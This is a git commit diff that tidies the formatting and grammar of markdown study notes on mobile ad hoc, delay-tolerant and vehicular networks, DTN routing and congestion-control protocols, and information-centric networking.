Tidy up
This commit is contained in:
103 files changed
+1689
-1805
No files matched your search
@@ -2,78 +2,76 @@
|
||||
|
||||
##### Part 1
|
||||
|
||||
* Mobile Ad Hoc Networks (MANETs)
|
||||
* Delay/Disconnection Tolerant Networks (DTNs)
|
||||
* Vehicular Ad Hoc Networks (VANETs)
|
||||
- Mobile Ad Hoc Networks (MANETs)
|
||||
- Delay/Disconnection Tolerant Networks (DTNs)
|
||||
- Vehicular Ad Hoc Networks (VANETs)
|
||||
|
||||
##### Part 2
|
||||
|
||||
* Network experimentation, criteria and evaluations. This part is to help with coursework
|
||||
- Network experimentation, criteria and evaluations. This part is to help with coursework
|
||||
|
||||
##### Part 3
|
||||
|
||||
* Peer to Peer (P2P)
|
||||
* Content Centric Networks (CCNs)
|
||||
* Information Centric Networks (ICNs)
|
||||
- Peer-to-Peer (P2P)
|
||||
- Content Centric Networks (CCNs)
|
||||
- Information Centric Networks (ICNs)
|
||||
|
||||
##### Part 4
|
||||
|
||||
* Software Defined Networks (SDNs) and Applications
|
||||
- Software Defined Networks (SDNs) and Applications
|
||||
|
||||
# Mobile Social Networks
|
||||
|
||||
They have two parts: physical part and a social part
|
||||
They have two parts: a physical part and a social part.
|
||||
|
||||
Social structures are vital for these networks - think covid tracking networks
|
||||
Social structures are vital for these networks - think COVID tracking networks.
|
||||
|
||||

|
||||
|
||||
Clouds have multiple layers
|
||||
|
||||
* Network interfaces
|
||||
* Request & accept sensor data
|
||||
* resource management
|
||||
* communicate with other clouds
|
||||
* Processing layer
|
||||
* Store raw data
|
||||
* filter noise
|
||||
* Analysing layer
|
||||
* produce trend chart
|
||||
* learn & predict user behaviour
|
||||
* Services
|
||||
* Interactive dashboard
|
||||
* notification service
|
||||
* sharing access
|
||||
|
||||
|
||||
- Network interfaces
|
||||
- Request & accept sensor data
|
||||
- Resource management
|
||||
- Communicate with other clouds
|
||||
- Processing layer
|
||||
- Store raw data
|
||||
- Filter noise
|
||||
- Analysing layer
|
||||
- Produce trend charts
|
||||
- Learn and predict user behaviour
|
||||
- Services
|
||||
- Interactive dashboard
|
||||
- Notification service
|
||||
- Sharing access
|
||||
|
||||
## Vehicle Ad Hoc Networks
|
||||
|
||||
Have social characteristics as they are driven by humans
|
||||
Have social characteristics as they are driven by humans.
|
||||
|
||||
VANETs may refer to robots or drones.
|
||||
|
||||
This can be used to exchange warning and beacon messages via V2V (vehicle to vehicle) as well as V2I (vehicle to infrastructure) channels.
|
||||
|
||||
### Fully autonomous Vehicles
|
||||
### Fully Autonomous Vehicles
|
||||
|
||||

|
||||
|
||||
Vehicles can connect to the cloud and share & request information to help other vehicles.
|
||||
Vehicles can connect to the cloud and share and request information to help other vehicles.
|
||||
|
||||

|
||||
|
||||
An example of transient clouds - in this case vehicular clouds.
|
||||
|
||||
This can be useful for informing cars behind about congestion. This is real time communication (order of ms which is needed for when cars are moving at 70 mph), cloud communication is not fast enough, due to the data needing to be processed before shared.
|
||||
This can be useful for informing cars behind about congestion. This is real-time communication (on the order of milliseconds, which is needed when cars are moving at 70 mph). Cloud communication is not fast enough, due to the data needing to be processed before it is shared.
|
||||
|
||||
## Challenges
|
||||
|
||||
* Optimal forwarding/routing
|
||||
* Congestion avoidance and control
|
||||
* Security and privacy aware communications
|
||||
* black & grey hole attacks
|
||||
* Energy efficient communications
|
||||
* Important for mobile devices & electric cars
|
||||
* Service provision
|
||||
* Location based services
|
||||
- Optimal forwarding/routing
|
||||
- Congestion avoidance and control
|
||||
- Security and privacy aware communications
|
||||
- black & grey hole attacks
|
||||
- Energy efficient communications
|
||||
- Important for mobile devices & electric cars
|
||||
- Service provision
|
||||
- Location based services
|
||||
@@ -1,47 +1,46 @@
|
||||
# Mobile Ad Hoc Networks (MANETs)
|
||||
|
||||
* An infrastructure-less network formed by mobile wireless nodes
|
||||
* Nodes in MANET can communicate via single or multi-hop approach (due to absence of centralised network infrastructure)
|
||||
* Nodes operate as clients, routers and servers at the same time to forward packets
|
||||
* The mobility of nodes results in frequent and unpredictable changes in network topology
|
||||
- An infrastructure-less network formed by mobile wireless nodes
|
||||
- Nodes in a MANET can communicate via a single- or multi-hop approach (due to the absence of centralised network infrastructure)
|
||||
- Nodes operate as clients, routers and servers at the same time to forward packets
|
||||
- The mobility of nodes results in frequent and unpredictable changes in network topology
|
||||
|
||||
One of the core features of a MANET node is the ability to autonomously connect to other nodes and configure itself for data transmission over the network.
|
||||
|
||||
|
||||
#### MANET Routing
|
||||
|
||||
* Mobile wireless nodes create a temporary connection between them to forward data
|
||||
* Because some nodes may not be cooperative or faulty, they may drop/compromise packets
|
||||
* Typically routing is split into **route discovery** and **actual data transmission**.
|
||||
* Nodes have to self organise in order to route.
|
||||
- Mobile wireless nodes create a temporary connection between them to forward data
|
||||
- Because some nodes may be uncooperative or faulty, they may drop or compromise packets
|
||||
- Typically routing is split into **route discovery** and **actual data transmission**.
|
||||
- Nodes have to self-organise in order to route.
|
||||
|
||||

|
||||
|
||||
(green boxes is route chosen)
|
||||
(The green boxes show the chosen route.)
|
||||
|
||||
The source has a limited range of nodes it can detect, it cannot send it direct to the destination as it doesn't know where the destination is. Hops are decided by communication protocols.
|
||||
The source has a limited range of nodes it can detect. It cannot send data directly to the destination as it doesn't know where the destination is. Hops are decided by communication protocols.
|
||||
|
||||
#### Proactive MANETs
|
||||
|
||||
* Also known as table driven routing protocol
|
||||
* Nodes in the network maintain a comprehensive routing information of the network
|
||||
* This is done by spreading network status information to nodes and tracking changes in network topology - think the network is constantly pinged
|
||||
* These status updates can slow the network with the traffic
|
||||
* Useful if the network is not that large
|
||||
- Also known as table-driven routing protocols
|
||||
- Nodes in the network maintain comprehensive routing information about the network
|
||||
- This is done by spreading network status information to nodes and tracking changes in network topology - think the network is constantly pinged
|
||||
- These status updates can slow the network with the traffic
|
||||
- Useful if the network is not that large
|
||||
|
||||
#### Reactive MANETs
|
||||
|
||||
* Also known as on-demand routing
|
||||
* Network nodes only store information of paths to destination nodes
|
||||
* Nodes delay the search for routes to new destinations in order to reduce communication overheads
|
||||
* i.e. if a route is found between A and B, this route will be stored and not recalculated
|
||||
* May be slower, as a shorter path may not be used
|
||||
- Also known as on-demand routing
|
||||
- Network nodes only store information about paths to destination nodes
|
||||
- Nodes delay the search for routes to new destinations in order to reduce communication overheads
|
||||
- i.e. if a route is found between A and B, this route will be stored and not recalculated
|
||||
- May be slower, as a shorter path may not be used
|
||||
|
||||
#### Hybrid MANETs
|
||||
|
||||
* Hybrid protocols combine the advantages of proactive and reactive protocols to reduce traffic overheads and route discovery delays
|
||||
- Hybrid protocols combine the advantages of proactive and reactive protocols to reduce traffic overheads and route discovery delays
|
||||
|
||||
Table showing all different protocols of MANETs
|
||||
Table showing the different MANET protocols:
|
||||
|
||||

|
||||
|
||||
@@ -49,22 +48,22 @@ Table showing all different protocols of MANETs
|
||||
|
||||
Traditional MANET routing protocols like DSR and AODV (both reactive) cannot work in intermittent infrastructure-less environments because they require a complete path from source to destination for communication.
|
||||
|
||||
* Messages get dropped at intermediate nodes when the link to the next hop is none existent in MANETs
|
||||
* DTNs expand MANETs to allow more intermittent and sparse connections of nodes caused by node mobility or low transmission range.
|
||||
- Messages get dropped at intermediate nodes when the link to the next hop is non-existent in MANETs
|
||||
- DTNs expand MANETs to allow more intermittent and sparse connections between nodes caused by node mobility or low transmission range.
|
||||
|
||||
#### Store-carry-forward Paradigm
|
||||
|
||||
* DTN routing protocols allow forwarding of messages by using a 'store-carry-forward' approach.
|
||||
* messages are stored by nodes and moved in hops throughout the network until messages reach their destination
|
||||
* This approach is used by DTN routing protocols to increase the probability of message delivery.
|
||||
- DTN routing protocols allow forwarding of messages by using a 'store-carry-forward' approach.
|
||||
- Messages are stored by nodes and moved in hops throughout the network until they reach their destination
|
||||
- This approach is used by DTN routing protocols to increase the probability of message delivery.
|
||||
|
||||
#### DTN Protocol Classifications
|
||||
|
||||
##### Flooding based
|
||||
##### Flooding-Based
|
||||
|
||||
* Flooding based routing protocols spread a message and have multiple copies of the message in the network.
|
||||
* This is done to increase the probability of messages reaching their destination and also decrease the time of delivery
|
||||
- Flooding-based routing protocols spread a message and have multiple copies of the message in the network.
|
||||
- This is done to increase the probability of messages reaching their destination and also decrease the time of delivery
|
||||
|
||||
##### Forwarding based
|
||||
##### Forwarding-Based
|
||||
|
||||
* Forwarding based routing protocols gather information about the nodes in a network to select the best path to forward messages with the aim of enhancing message delivery networks with limited resources.
|
||||
- Forwarding-based routing protocols gather information about the nodes in a network to select the best path to forward messages, with the aim of enhancing message delivery in networks with limited resources.
|
||||
@@ -1,23 +1,23 @@
|
||||
# Vehicular Ad Hoc Networks
|
||||
|
||||
* VANETs are a special type of Mobile Ad Hoc network which is used to
|
||||
* provide communication between vehicles that are nearby (V2V)
|
||||
* between vehicles on the road and fixed infrastructures on the roadside (V2I)
|
||||
* VANETs provide complementary approach for intelligent transport system (ITS) and are characterised by **high node mobility** and the limited degree of freedom in the mobility patterns.
|
||||
- VANETs are a special type of mobile ad hoc network used to provide communication:
|
||||
- Between nearby vehicles (V2V)
|
||||
- Between vehicles on the road and fixed infrastructure on the roadside (V2I)
|
||||
- VANETs provide a complementary approach for intelligent transport systems (ITS) and are characterised by **high node mobility** and a limited degree of freedom in their mobility patterns.
|
||||
|
||||
##### Categories of information
|
||||
|
||||
1. Safety application information
|
||||
* e.g. information regarding an accident that has just occurred
|
||||
* the current conditions of the road
|
||||
- e.g. information regarding an accident that has just occurred
|
||||
- the current conditions of the road
|
||||
2. Convenience application
|
||||
* traffic information
|
||||
* parking availability
|
||||
- traffic information
|
||||
- parking availability
|
||||
3. Commercial application for pleasure
|
||||
* games
|
||||
* real-time video relay
|
||||
- games
|
||||
- real-time video relay
|
||||
|
||||
### Why do VANETs need different protocols to MANETs
|
||||
### Why Do VANETs Need Different Protocols from MANETs?
|
||||
|
||||
###### Large scale
|
||||
|
||||
@@ -25,7 +25,7 @@
|
||||
|
||||
###### Predictive Mobility
|
||||
|
||||
> The nodes in a VANET cannot follow arbitrary direction, they have to stay on the road and cannot suddenly change their direction.
|
||||
> The nodes in a VANET cannot follow arbitrary directions. They have to stay on the road and cannot suddenly change direction.
|
||||
|
||||
###### High Mobility
|
||||
|
||||
@@ -33,49 +33,49 @@
|
||||
|
||||
###### Partitioned Network
|
||||
|
||||
> The ranges of wireless communication used in V2V networks is near 1 km but vehicles can get disconnected. Can be thought of many disconnected networks.
|
||||
> The range of wireless communication used in V2V networks is around 1 km, but vehicles can become disconnected. This can be thought of as many disconnected networks.
|
||||
|
||||
The nodes in the VANET can move at **high speeds** which **reduces transmission capacity**, this causes the following issues:
|
||||
The nodes in the VANET can move at **high speeds**, which **reduces transmission capacity**. This causes the following issues:
|
||||
|
||||
* **Rapid changes in the network topology** because the state of connectivity between nodes is dynamically changing.
|
||||
- **Rapid changes in the network topology** because the state of connectivity between nodes is dynamically changing.
|
||||
|
||||
* **Occasional disconnections due to low traffic density**. This keeps the nodes distant from each other and results to **link failure** that could last for awhile.
|
||||
- **Occasional disconnections due to low traffic density**. This keeps the nodes distant from each other and results in **link failure** that could last for a while.
|
||||
|
||||
* **Node congestion**, a high traffic situation which affects protocol performance.
|
||||
- **Node congestion**, a high traffic situation which affects protocol performance.
|
||||
|
||||
### WAVE IEEE 802.11p
|
||||
|
||||
WAVE - Wireless Access for Vehicular Environment
|
||||
|
||||
* In WAVE vehicles communicate in a **hop by hop** manner with each other
|
||||
* The area of coverage for the WAVE node is limited to 300m-800m
|
||||
* Beyond this range cars cannot communicate
|
||||
- In WAVE, vehicles communicate with each other in a **hop-by-hop** manner
|
||||
- The area of coverage for the WAVE node is limited to 300 m-800 m
|
||||
- Beyond this range cars cannot communicate
|
||||
|
||||
If there is dense traffic in the coverage region, **nodes become easily congested** because all nodes will be transmitting the same message to every other node.
|
||||
|
||||
> To overcome the limitation of restricted coverage region, the use of DTNs was implemented which uses a **store-carry-forward paradigm**.
|
||||
> To overcome the limitation of a restricted coverage region, DTNs were implemented using a **store-carry-forward paradigm**.
|
||||
>
|
||||
> With the store-carry-forward approach, a vehicle stores a message in a buffer and carries the message with it. When it comes into contact with another node, it forwards the message.
|
||||
>
|
||||
> * This introduced the idea of the **Vehicular Delay Tolerant Network (VDTN)** concept
|
||||
> - This introduced the idea of the **Vehicular Delay Tolerant Network (VDTN)** concept
|
||||
|
||||
#### Vehicular Delay Tolerant Network (VDTN)
|
||||
|
||||
VDTNs enable communication in the face of connectivity issues such as
|
||||
|
||||
* long and variable delay
|
||||
* sparse and intermittent connectivity
|
||||
* high error rates
|
||||
* high latency
|
||||
* high asymmetric data rate
|
||||
- long and variable delay
|
||||
- sparse and intermittent connectivity
|
||||
- high error rates
|
||||
- high latency
|
||||
- high asymmetric data rate
|
||||
|
||||
Communication is made possible in the network when intermediate nodes become **custodians** of the message being transmitted and then forward the message only when a opportunity arises.
|
||||
Communication is made possible in the network when intermediate nodes become **custodians** of the message being transmitted and then forward the message only when an opportunity arises.
|
||||
|
||||
###### Fixed DTN nodes
|
||||
|
||||
* The stationary or relay nodes have store and forward capabilities and are located at **road-side intersections** (road side units)
|
||||
* They allow mobile nodes that pass by to collect and leave data on them.
|
||||
* They contribute to increasing the frequency of node contacts and improve **delivery ratio** and **delivery delay**.
|
||||
- The stationary or relay nodes have store-and-forward capabilities and are located at **roadside intersections** (roadside units)
|
||||
- They allow mobile nodes that pass by to collect and leave data on them.
|
||||
- They contribute to increasing the frequency of node contacts and improve **delivery ratio** and **delivery delay**.
|
||||
|
||||

|
||||
|
||||
@@ -85,7 +85,7 @@ Communication is made possible in the network when intermediate nodes become **c
|
||||
|
||||
> Pure cellular VANETs may use **fixed cellular gateways and WiMAX access points at road** intersections to gather information
|
||||
>
|
||||
> * note these road side gateways may not be feasible due to cost of infrastructure
|
||||
> - Note that these roadside gateways may not be feasible due to the cost of infrastructure
|
||||
>
|
||||
> The information collected from sensors of a vehicle in the VANET can become valuable in notifying other nodes about the situation of the traffic in the network.
|
||||
|
||||
@@ -97,6 +97,6 @@ Communication is made possible in the network when intermediate nodes become **c
|
||||
|
||||
##### Hybrid
|
||||
|
||||
> The hybrid category is a combination of the first two. It provides a richer content and offers great **flexibility in the sharing of data**
|
||||
> The hybrid category is a combination of the first two. It provides richer content and offers great **flexibility in the sharing of data**
|
||||
>
|
||||
> * Some vehicles with WLAN and cellular capabilities may be used as **gateways** and **mobile routers** so that vehicles with only WLAN capabilities can interact and communicate effectively with them via multi-hop links.
|
||||
> - Some vehicles with WLAN and cellular capabilities may be used as **gateways** and **mobile routers** so that vehicles with only WLAN capabilities can interact and communicate effectively with them via multi-hop links.
|
||||
@@ -4,62 +4,61 @@
|
||||
|
||||
Where each message may only be under the custody of a single node.
|
||||
|
||||
* Upon forwarding the message, the receiving node also takes on the responsibility of custody.
|
||||
* This means there will exist only one copy of the message within the network at any period of time.
|
||||
- Upon forwarding the message, the receiving node also takes on the responsibility of custody.
|
||||
- This means there will exist only one copy of the message within the network at any period of time.
|
||||
|
||||
#### Direct Transmission
|
||||
|
||||
* Direct transmission is the simplest single-copy forwarding protocol possible.
|
||||
* Once the source has generated a message, it will retain custody and carry it until it encounters the destination.
|
||||
* Once a connection with the destination is established, the message is forwarded directly
|
||||
* This uses minimal resources
|
||||
* Has unbounded amounts of latency
|
||||
* Probability of a message being delivered is only as likely as the probability of the node encountering the destination node
|
||||
- Direct transmission is the simplest single-copy forwarding protocol possible.
|
||||
- Once the source has generated a message, it will retain custody and carry it until it encounters the destination.
|
||||
- Once a connection with the destination is established, the message is forwarded directly
|
||||
- This uses minimal resources
|
||||
- Has unbounded amounts of latency
|
||||
- Probability of a message being delivered is only as likely as the probability of the node encountering the destination node
|
||||
|
||||
#### First Contact
|
||||
|
||||
* First contact is a single-copy based forwarding protocol - it randomly chooses a node out of all possible nodes and forwards as many messages as possible to that node.
|
||||
* If no connections are available, the first encountered node will be used.
|
||||
* Once the message(s) are sent, the messages on the original node are deleted, relinquishing custody to the new node.
|
||||
* This protocol routes messages throughout the network via a random walk pattern.
|
||||
* This can lead to packets being routed to dead ends.
|
||||
* Packets can make negative progress or getting stuck in a loop.
|
||||
- First contact is a single-copy based forwarding protocol - it randomly chooses a node out of all possible nodes and forwards as many messages as possible to that node.
|
||||
- If no connections are available, the first encountered node will be used.
|
||||
- Once the message(s) are sent, the messages on the original node are deleted, relinquishing custody to the new node.
|
||||
- This protocol routes messages throughout the network via a random walk pattern.
|
||||
- This can lead to packets being routed to dead ends.
|
||||
- Packets can make negative progress or get stuck in a loop.
|
||||
|
||||
### Replication Based
|
||||
|
||||
Replication-based protocols disseminate messages throughout the network via replication of the messages.
|
||||
|
||||
* When one node encounters another, it will forward the message while retaining the local copy it has.
|
||||
* The existence of multiple copies increases the probability of message delivery and reduces latency.
|
||||
* The more nodes carrying the message, the more chance one node encounters the destination.
|
||||
* However this also means there are many redundant messages on the network - therefore more resources are needed.
|
||||
- When one node encounters another, it will forward the message while retaining the local copy it has.
|
||||
- The existence of multiple copies increases the probability of message delivery and reduces latency.
|
||||
- The more nodes carrying the message, the more chance one node encounters the destination.
|
||||
- However, this also means there are many redundant messages on the network - therefore more resources are needed.
|
||||
|
||||
#### Epidemic
|
||||
|
||||
* Utilising the flooding concept, Epidemic aims to achieve message delivery by flooding the network with message copies.
|
||||
* When any two nodes meet, they compare messages.
|
||||
* They then exchange messages they do not have in common
|
||||
* This is repeated allowing the messages to spread similar to an epidemic.
|
||||
* This method achieves minimal latency & high delivery probabilities however suffers from limited resources.
|
||||
- Utilising the flooding concept, Epidemic aims to achieve message delivery by flooding the network with message copies.
|
||||
- When any two nodes meet, they compare messages.
|
||||
- They then exchange messages they do not have in common
|
||||
- This is repeated, allowing the messages to spread similarly to an epidemic.
|
||||
- This method achieves minimal latency and high delivery probabilities, but suffers from limited resources.
|
||||
|
||||
#### MaxProp
|
||||
|
||||
* Like epidemic, maxprop floods the network, however each message has a priority.
|
||||
* Messages stored in a **ordered-queue** in the **message buffer**.
|
||||
* Messages with a higher probability of being delivered have a higher priory of being forwarded first.
|
||||
* To determine the probability, it looks at **history of encounters**, maintaining a vector with **tracks the likelihood of the node encountering any other node in the network**.
|
||||
* When two nodes meet, they exchange messages and vectors, updating their own local copy.
|
||||
* These vectors are then used to compute the shortest path for each message, messages are then ordered within the buffer by destination cost.
|
||||
* MaxProp uses overhead messages to acknowledge when a message has reached it destination
|
||||
* Once this ACK signal is received, all local copies of redundant messages are dropped.
|
||||
- Like Epidemic, MaxProp floods the network, but each message has a priority.
|
||||
- Messages are stored in an **ordered queue** in the **message buffer**.
|
||||
- Messages with a higher probability of being delivered have a higher priority of being forwarded first.
|
||||
- To determine the probability, it looks at the **history of encounters**, maintaining a vector that **tracks the likelihood of the node encountering any other node in the network**.
|
||||
- When two nodes meet, they exchange messages and vectors, updating their own local copy.
|
||||
- These vectors are then used to compute the shortest path for each message. Messages are then ordered within the buffer by destination cost.
|
||||
- MaxProp uses overhead messages to acknowledge when a message has reached its destination
|
||||
- Once this ACK signal is received, all local copies of redundant messages are dropped.
|
||||
|
||||
#### PROPHET
|
||||
|
||||
Probabilistic Routing Protocol using History of Encounters and Transitivity (PRoPHET)
|
||||
|
||||
* PROPHET maintains a vector that keeps track of a history of the encountered nodes.
|
||||
* It uses this vector to calculate the probability of a message copy reaching its destination by being forwarded to a particular node.
|
||||
* When a source node forwards a message copy, it selects a subset of nodes that it can possibly send to.
|
||||
* The algorithm then **ranks these nodes** based on the calculated probabilities, with the copy being forwarded to the highest ranked nodes first.
|
||||
* This is effective however the routing tables **rapidly grow** as a result of the amount of information on the nodes required to calculate the probability predictions.
|
||||
|
||||
- PROPHET maintains a vector that keeps track of a history of the encountered nodes.
|
||||
- It uses this vector to calculate the probability of a message copy reaching its destination by being forwarded to a particular node.
|
||||
- When a source node forwards a message copy, it selects a subset of nodes that it can possibly send to.
|
||||
- The algorithm then **ranks these nodes** based on the calculated probabilities, with the copy being forwarded to the highest ranked nodes first.
|
||||
- This is effective, but the routing tables **rapidly grow** as a result of the amount of information about the nodes required to calculate the probability predictions.
|
||||
@@ -6,39 +6,39 @@
|
||||
|
||||
#### Spray and Focus
|
||||
|
||||
* Spray and focus replicates an allowable number of messages from source in the spray phase.
|
||||
* **The focus phase allows** each node to forward a copy of its messages to other potential nodes until the messages gets to its destination.
|
||||
* The protocol uses a single-copy utility based routing scheme to forward a copy of the message further.
|
||||
* Forwarding decisions are made based on **timers** which record the times nodes come in communication range of each other.
|
||||
* Node $A$ forwards message with destination $D$ to node $B$ , **if and only if** $B$ has a higher potential of delivering the message to $D$.
|
||||
- Spray and Focus replicates an allowable number of messages from the source in the spray phase.
|
||||
- **The focus phase allows** each node to forward a copy of its messages to other potential nodes until the messages reach their destinations.
|
||||
- The protocol uses a single-copy, utility-based routing scheme to forward a copy of the message further.
|
||||
- Forwarding decisions are made based on **timers** which record the times when nodes come within communication range of each other.
|
||||
- Node $A$ forwards a message with destination $D$ to node $B$, **if and only if** $B$ has a higher potential of delivering the message to $D$.
|
||||
|
||||
#### SimBet
|
||||
|
||||
* A source node with no prior knowledge of the destination node will forward a message to a more central node that has the potential of finding a suitable relay node.
|
||||
* A central node has the ease of connecting other nodes in a network.
|
||||
* This is known as **centrality** a measure of the **structural importance** of a node in a network.
|
||||
* A central node uses **similarity and betweenness centrality** to avoid unnecessary information exchange in the entire network.
|
||||
* SimBet maintains a single copy of each message in the network to reduce resource overheads.
|
||||
- A source node with no prior knowledge of the destination node will forward a message to a more central node that has the potential of finding a suitable relay node.
|
||||
- A central node has the ease of connecting other nodes in a network.
|
||||
- This is known as **centrality**, a measure of the **structural importance** of a node in a network.
|
||||
- A central node uses **similarity and betweenness centrality** to avoid unnecessary information exchange in the entire network.
|
||||
- SimBet maintains a single copy of each message in the network to reduce resource overheads.
|
||||
|
||||
### Replication Management
|
||||
|
||||
Replication Management refers to easing network congestion by managing the amount and frequency that messages are replicated.
|
||||
Replication management refers to easing network congestion by managing the number of message copies and the frequency with which messages are replicated.
|
||||
|
||||
* This is particularly notable concern as it is often the replication of messages that leads to congestion in DTNs, with surplus and redundant messages causing wastage within node message buffers.
|
||||
- This is a particularly notable concern as it is often the replication of messages that leads to congestion in DTNs, with surplus and redundant messages causing wastage within node message buffers.
|
||||
|
||||
#### Café
|
||||
|
||||
* Congestion Aware Forwarding Algorithm (Café)
|
||||
* Single-copy
|
||||
* Adaptive forwarding techniques - to reduce network congestion by directing traffic away from nodes experiencing congestion to less congested areas of the network.
|
||||
* Uses **Contact Manager** and **Congestion Manager**
|
||||
- Congestion Aware Forwarding Algorithm (Café)
|
||||
- Single-copy
|
||||
- Adaptive forwarding techniques - to reduce network congestion by directing traffic away from nodes experiencing congestion to less congested areas of the network.
|
||||
- Uses **Contact Manager** and **Congestion Manager**
|
||||
|
||||
**Contact Manager** - deals with nodes forwarding heuristics, updating statistics for each contact such as frequency and duration's.
|
||||
**Contact Manager** - deals with nodes' forwarding heuristics, updating statistics for each contact such as frequency and duration.
|
||||
|
||||
**Congestion Manager** - focuses on calculating the availability of nodes, keeping and updating a record of information such as the amount of available buffer and delays expected from each contacted node.
|
||||
|
||||
#### CafREP
|
||||
|
||||
* Congestion Aware Forwarding and Replication (CafREP)
|
||||
* replication-based
|
||||
* builds on Cafe protocol by coalescing the proposed **adaptive forwarding algorithm with an adaptive replication management technique**
|
||||
- Congestion Aware Forwarding and Replication (CafREP)
|
||||
- replication-based
|
||||
- Builds on the Café protocol by coalescing the proposed **adaptive forwarding algorithm with an adaptive replication management technique**
|
||||
@@ -1,18 +1,18 @@
|
||||
# Framework for Congestion Control in Delay Tolerant Opportunistic Networks
|
||||
|
||||
DTNs mainly focus on increasing the probability to deliver to the destination and on minimising delays
|
||||
DTNs mainly focus on increasing the probability of delivery to the destination and on minimising delays.
|
||||
|
||||
* Using complex graph theory techniques
|
||||
* Where load is unfairly distributed towards the better connected nodes
|
||||
* May lead to network congestion
|
||||
- Using complex graph theory techniques
|
||||
- Where load is unfairly distributed towards the better connected nodes
|
||||
- May lead to network congestion
|
||||
|
||||
## CAFREP
|
||||
|
||||
CAFREP or Congestion Aware Forwarding and Replication
|
||||
|
||||
* Detects the congested nodes and parts of the network
|
||||
* Moves the traffic away from hot-spots and spreads it around while preserving the directionality of the traffic and not overwhelming non-interested nodes with unwanted content
|
||||
* Adaptively change message replication rates
|
||||
- Detects the congested nodes and parts of the network
|
||||
- Moves the traffic away from hot-spots and spreads it around while preserving the directionality of the traffic and not overwhelming non-interested nodes with unwanted content
|
||||
- Adaptively changes message replication rates
|
||||
|
||||
When deciding on the best carrier and the optimal number of messages, CAFREP dynamically combines three heuristics
|
||||
|
||||
@@ -22,7 +22,7 @@ When deciding on the best carrier and the optimal number of messages, CAFREP dyn
|
||||
|
||||

|
||||
|
||||
Each layer you go up, the more information is exchanged between the nodes.
|
||||
As you move up each layer, more information is exchanged between the nodes.
|
||||
|
||||
### Metrics
|
||||
|
||||
@@ -34,43 +34,43 @@ $$
|
||||
Ret(X) = B_c(X) - \sum^N_{i=1} \space M^i_{size}(X)
|
||||
$$
|
||||
|
||||
For a node $X$, it has buffer of size $B_c(X)$. When a message of size $M^i_{size}$ is sent to node $X$, it's buffer size is the total buffer minus the memory taken by the sum of all messages in the buffer.
|
||||
Node $X$ has a buffer of size $B_c(X)$. When a message of size $M^i_{size}$ is sent to node $X$, its available buffer size is the total buffer minus the memory taken by the sum of all messages in the buffer.
|
||||
|
||||
###### Node Receptiveness
|
||||
|
||||
- Aims to avoid or decrease sending rates to the **nodes** that have higher in network delays
|
||||
- Aims to avoid or decrease sending rates to the **nodes** that have higher in-network delays
|
||||
|
||||
$$
|
||||
Rec(X) = \sum^N_{i=1}(T_{now} - M^i_{received}(X))
|
||||
$$
|
||||
|
||||
How long a node keeps a message before forwarding it on. If a high level of receptiveness is found on a node, it means the node isn't useful as messages aren't forwarded. Could mean the node has limited connections.
|
||||
How long a node keeps a message before forwarding it on. If a high level of receptiveness is found on a node, it means the node isn't useful as messages aren't forwarded. This could mean the node has limited connections.
|
||||
|
||||
###### Node Congestion Rate
|
||||
|
||||
- Aims to avoid or decrease sending rates to **nodes** that congest at the higher rate
|
||||
- Aims to avoid or decrease sending rates to **nodes** that become congested at a higher rate
|
||||
|
||||
$$
|
||||
CR(X) = \frac{100\cdot T_{FullBuffer}(X)/T_{TotalTime}(X)}{\frac{1}{N}\cdot \sum^N_{i=1}(T_iend(X) - T_istart(X))}
|
||||
$$
|
||||
|
||||
Estimates the time between a node being full and full again. Measures the time the node is unusable.
|
||||
Estimates the time between a node being full and becoming full again. Measures the time the node is unusable.
|
||||
|
||||
#### Ego Network Congestion Metrics
|
||||
|
||||
###### Ego Network Retentiveness
|
||||
|
||||
* Aims to replicate less at the **parts of the network** with lower buffer availability.
|
||||
- Aims to replicate less at the **parts of the network** with lower buffer availability.
|
||||
|
||||
$$
|
||||
EN_{Ret}(X) = \frac{1}{N}\sum^N_{i=1}Ret(C_i(X))
|
||||
$$
|
||||
|
||||
Gets the average of the retentiveness of node $X$ and it's neighbours $c_i(X)$
|
||||
Gets the average retentiveness of node $X$ and its neighbours $c_i(X)$.
|
||||
|
||||
###### Ego Network Receptiveness
|
||||
|
||||
* Aims to replicate less at **parts of the network** with higher delays.
|
||||
- Aims to replicate less at **parts of the network** with higher delays.
|
||||
|
||||
$$
|
||||
EN_{Rec}(X) = \frac{1}{N}\sum^N_{i=1}Rec(c_i(X))
|
||||
@@ -79,7 +79,7 @@ $$
|
||||
###### Ego Network Congestion Rate
|
||||
|
||||
- Aims to send less to the **parts of the network** that have higher congestion rates.
|
||||
- This is useful as if a node isn't congested, but all connected nodes are. It stops it from being used.
|
||||
- This is useful if a node isn't congested but all connected nodes are. It stops the node from being used.
|
||||
|
||||
$$
|
||||
EN_{CR}(X) = \frac{1}{N}\sum^N_{i=1}CR_i(X)
|
||||
@@ -93,6 +93,6 @@ $$
|
||||
Replication\space rate = M \times \frac{TotalUtil(Y)}{TotalUtil(X) + TotalUtil(Y)}
|
||||
$$
|
||||
|
||||
Total utility, changes constantly. The replication limit grows to take advantage of all available resources, and backs off when congestion increases.
|
||||
Total utility changes constantly. The replication limit grows to take advantage of all available resources and backs off when congestion increases.
|
||||
|
||||
Social utility prevents replication at a high rate on free nodes that are not on the path to the destination.
|
||||
@@ -1,17 +1,17 @@
|
||||
# Information Centric Networks
|
||||
# Information-Centric Networks
|
||||
|
||||
#### Problems with today's Networks
|
||||
|
||||
* URLs and IP addresses are overloaded with locator and identifier functionality.
|
||||
* No consistent way to keep track of *identical copies*.
|
||||
* Information dissemination is inefficient.
|
||||
* Cannot benefit from existing copies
|
||||
* Can lead to problems like Flash-Crowd effect and Denial of service
|
||||
* Can't trust a copy received from an un-trusted node
|
||||
* Security is host-Centric
|
||||
* Based on *securing channels* (encryption) and trusting servers (authentication)
|
||||
* Application and content providers are independent of each other
|
||||
* CDNs focus on web content distributions for major players
|
||||
- URLs and IP addresses are overloaded with locator and identifier functionality.
|
||||
- No consistent way to keep track of *identical copies*.
|
||||
- Information dissemination is inefficient.
|
||||
- Cannot benefit from existing copies
|
||||
- Can lead to problems like Flash-Crowd effect and Denial of service
|
||||
- Can't trust a copy received from an untrusted node
|
||||
- Security is host-centric
|
||||
- Based on *securing channels* (encryption) and trusting servers (authentication)
|
||||
- Application and content providers are independent of each other
|
||||
- CDNs focus on web content distributions for major players
|
||||
|
||||

|
||||
|
||||
@@ -25,48 +25,48 @@
|
||||
|
||||
Apart from routing protocols that use direct identifiers of nodes, networking can take place based directly on content.
|
||||
|
||||
* Content can be **collected** from the network, **processed** in the network and **stored** in the network.
|
||||
